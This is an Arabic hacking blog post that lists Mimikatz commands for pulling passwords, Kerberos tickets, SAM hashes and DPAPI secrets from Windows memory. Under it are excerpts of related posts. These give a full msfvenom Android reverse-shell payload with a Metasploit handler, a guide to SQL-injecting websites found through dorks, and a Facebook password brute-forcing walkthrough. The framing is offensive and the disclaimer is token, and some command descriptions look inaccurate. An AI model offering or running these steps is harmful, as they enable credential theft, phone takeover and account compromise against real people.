ميمي كاتز (Mimikatz): أداة قوية لفحص واختراق الأنظمة

 Mr. RedRaccoon


ميمي كاتز هي أداة متقدمة في مجال الهكر والتجسس على الأنظمة، وقد تم تطويرها لمساعدة المحققين الرقميين والباحثين في الأمن السيبراني لاستخراج معلومات حساسة من الأنظمة. أنشأها الباحث الأمني الفرنسي بنيامين ديلبي في عام 2011. تستخدم الأداة لاستغلال الثغرات في أنظمة ويندوز لسحب كلمات المرور والمعلومات الحساسة من ذاكرة النظام.

الأوامر والوظائف الرئيسية لأداة ميمي كاتز:

  1. privilege::debug

    • يشغل صلاحيات التصحيح في النظام، مما يمنح الهكر القدرة على التحكم الكامل في النظام.

  2. sekurlsa::logonpasswords

    • يستخرج كلمات المرور المخزنة في النظام، مما يسهل الحصول على كلمات المرور بدون جهد كبير.

  3. sekurlsa::tickets

    • يعرض تذاكر Kerberos المخزنة في النظام، مما يساعد في الاستيلاء على الجلسات الحالية للوصول إلى الموارد دون إعادة المصادقة.

  4. lsadump::sam

    • يفريغ ملفات SAM التي تحتوي على كلمات مرور المستخدمين في النظام، مما يسمح بإعادة استخدام كلمات المرور في هجمات أخرى.

  5. lsadump::secrets

    • يظهر الأسرار المخزنة في النظام، مما يساعد في الوصول لمعلومات حساسة.

  6. token::elevate

    • يحاول رفع الصلاحيات في النظام، مما يتيح السيطرة الكاملة على النظام.

  7. vault::cred

    • يعرض معلومات الاعتمادات المخزنة في خزنة الويندوز، وهي معلومات حساسة جداً.

  8. dpapi::cred

    • يظهر بيانات DPAPI المستخدمة لحماية البيانات، مما يساعد في فك تشفير البيانات المحمية.

  9. crypto::capi

    • يعرض مفاتيح CAPI المخزنة في النظام، مما يساعد في فك تشفير الاتصالات المشفرة.

  10. crypto::certificates

    • يظهر معلومات عن الشهادات المخزنة في النظام، مما يساعد في فهم البنية التحتية للشبكة والتخطيط لهجمات مستقبلية.

  11. crypto::keys

    • يعرض المفاتيح المخزنة في النظام، مما يساعد في فك تشفير البيانات.

  12. misc::memssp

    • يظهر بيانات SSP المخزنة في الذاكرة، مما يساعد في استغلال الجلسات الحالية.

  13. misc::sysinfo

    • يعرض معلومات عن النظام، مما يساعد في فهم بيئة العمل والتخطيط للهجوم.

  14. misc::wifi

    • يظهر ملفات تعريف الواي فاي المخزنة في النظام، مما يساعد في الوصول إلى شبكات الواي فاي المخزنة.

  15. kerberos::list

    • يعرض قائمة بتذاكر Kerberos المخزنة في النظام، مما يساعد في استغلال الجلسات الحالية.

  16. kerberos::tgt

    • يظهر معلومات TGT، مما يساعد في الاستيلاء على الجلسات.

  17. kerberos::ptt

    • يسمح بتمرير تذكرة Kerberos للنظام، مما يساعد في الدخول إلى الموارد دون إعادة المصادقة.

  18. kerberos::kerberos

    • يعرض تذاكر Kerberos المخزنة، مما يساعد في الاستيلاء على الجلسات.

  19. livessp::tspkg

    • يستخرج معلومات TSPKG من LSASS، مما يساعد في الحصول على كلمات المرور.

  20. livessp::msv

    • يظهر الاعتمادات المخزنة في النظام، مما يساعد في الحصول على كلمات المرور.

  21. livessp::credman

    • يعرض معلومات CredMan المخزنة في النظام، مما يساعد في الحصول على كلمات المرور.

  22. livessp::tspkrd

    • يظهر بيانات TSPKG المخزنة في النظام، مما يساعد في الحصول على كلمات المرور.

  23. livessp::wdigest

    • يظهر بيانات WDigest المخزنة في النظام، مما يساعد في الحصول على كلمات المرور.

  24. livessp::kerberos

    • يظهر بيانات Kerberos المخزنة في النظام، مما يساعد في الاستيلاء على الجلسات.

  25. livessp::cred

    • يظهر بيانات LSASS المخزنة في النظام، مما يساعد في الحصول على كلمات المرور.

تحذير: ميمي كاتز هي أداة قوية وخطيرة في عالم الهكر. من الضروري اتخاذ إجراءات أمنية قوية لحماية نظامك منها، مثل تحديث النظام بانتظام، تفعيل خصائص الحماية المتقدمة، وتوعية المستخدمين بالمخاطر الأمنية.

تعليقات

إرسال تعليق

Thankyou.

المشاركات الشائعة من هذه المدونة

كيفية إنشاء Payload ملغم واستخدام Metasploit

صورة
Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...
قراءة المزيد

كيفية اختراق موقع ويب باستخدام Termux

صورة
Mr.  RedRaccoon الخطوة الأولى: تحديث النظام وتثبيت الأدوات اللازمة تحديث النظام وتثبيت الأدوات: افتح Termux وأدخل الأوامر التالية: $ apt update && apt upgrade $ pkg install python2 $ pkg install git تثبيت Termux-LazySQLMap: أدخل الأوامر التالية لتثبيت الأداة: $ git clone https://github.com/verluchie/termux-lazysqlmap $ cd termux-lazysqlmap $ chmod 777 install.sh $ ./install.sh الخطوة الثانية: استخدام Google Dorks للعثور على مواقع الويب استخدم Google Dorks للعثور على مواقع الويب الضعيفة التي يمكنك اختبارها. (لمزيد من المعلومات حول Google Dorks، يمكنك البحث عن كيفية استخدامها). الخطوة الثالثة: تنفيذ الاختراق باستخدام Termux-LazySQLMap تشغيل الأداة: بعد تثبيت Termux-LazySQLMap، ابدأ الأداة بكتابة الأمر التالي في Termux: $ lazysqlmap اختيار الموقع المستهدف: أدخل عنوان الموقع الذي تريد اختراقه عندما يُطلب منك ذلك. اختيار خيارات التحقق: اختر الخيار المناسب لك. على سبيل المثال، اختر الخيار الذي يعود بالجداول في قاعدة البيانات. استرجاع الجداول: استخدم الأمر sitedb لاسترجاع الجد...
قراءة المزيد

كيفية اختراق حساب فيسبوك باستخدام Termux

صورة
Mr.  RedRaccoon ملاحظة: يجب أن تكون على علم بأن استخدام الأدوات والبرمجيات لاختراق الحسابات بدون إذن هو غير قانوني وغير أخلاقي. الهدف من هذا الشرح هو توضيح كيفية عمل الأدوات لأغراض تعليمية فقط. يجب عليك دائمًا احترام خصوصية الآخرين والامتثال للقوانين المحلية. إليك خطوات استخدام Termux لاختراق حساب فيسبوك عبر التخمين: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات المطلوبة: apt update && apt upgrade $ $ pkg install git $ pkg install python $ pkg install python2 تثبيت سكربت التخمين: قم بتحميل السكربت من GitHub باستخدام الأوامر التالية: $git clone https://github.com/hackermohamedPro/Aliens-fb $ $ cd Aliens-fb $ pip2 install mechanize إنشاء قائمة كلمات المرور: قم بتشغيل السكربت لإنشاء قائمة كلمات مرور: $python Aliens-list.py عند تشغيل السكربت، سيُطلب منك إدخال اسم لقائمة كلمات المرور، تأكد من استخدام تنسيق .txt مثل passwords.txt . املأ القائمة بكلمات المرور المحتملة، ثم اكتب Pro واضغط على Enter . تشغيل أداة التخمين: ...
قراءة المزيد